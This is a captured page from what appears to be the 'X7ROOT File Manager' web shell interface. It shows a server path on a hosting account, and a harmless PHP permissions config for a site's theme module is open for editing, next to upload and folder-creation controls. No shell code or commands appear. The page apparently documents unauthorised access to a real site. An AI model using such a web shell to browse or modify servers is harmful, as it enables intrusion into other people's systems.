X7ROOT File Manager
Current Path:
/home/gfecatvj/sites/restate/platform/packages/theme/config
home
/
gfecatvj
/
sites
/
restate
/
platform
/
packages
/
theme
/
config
/
📁
..
📄
general.php
(3.96 KB)
📄
permissions.php
(776 B)
Editing: permissions.php
<?php return [ [ 'name' => 'Appearance', 'flag' => 'core.appearance', ], [ 'name' => 'Theme', 'flag' => 'theme.index', 'parent_flag' => 'core.appearance', ], [ 'name' => 'Activate', 'flag' => 'theme.activate', 'parent_flag' => 'theme.index', ], [ 'name' => 'Remove', 'flag' => 'theme.remove', 'parent_flag' => 'theme.index', ], [ 'name' => 'Theme options', 'flag' => 'theme.options', 'parent_flag' => 'core.appearance', ], [ 'name' => 'Custom CSS', 'flag' => 'theme.custom-css', 'parent_flag' => 'core.appearance', ], ];
Upload File
Create Folder